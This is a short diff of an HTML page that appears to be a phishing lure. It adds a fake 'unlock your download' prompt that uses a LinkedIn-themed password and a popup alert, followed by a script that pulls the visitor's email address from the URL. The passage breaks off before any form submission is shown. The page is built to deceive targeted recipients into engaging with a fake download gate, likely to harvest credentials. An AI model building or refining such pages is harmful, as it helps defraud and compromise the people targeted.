--- a/index.html
+++ b/index.html
@@ -1,5 +1,8 @@
 <script language="javascript">alert(' The download password is: LinkedIn');  </script>
-<p><p><p><p><p><p><p><center><p><b>The download password is: LinkedIn</b>
+
+<br><br><br><br><br><br><br><br><br><br><br><h2>Unlock your download by entering the password, then click on the "Download File" button to get instant access to your content!</h2>
+<p>Enter the Downliad Password as:<b>Linkedin
+<br><br><br><br><br><pbr><br><center><br><b>The download password is: LinkedIn</b>
 <script>const urlParams = new URLSearchParams(window.location.search);
 const id = urlParams.get('email');
 
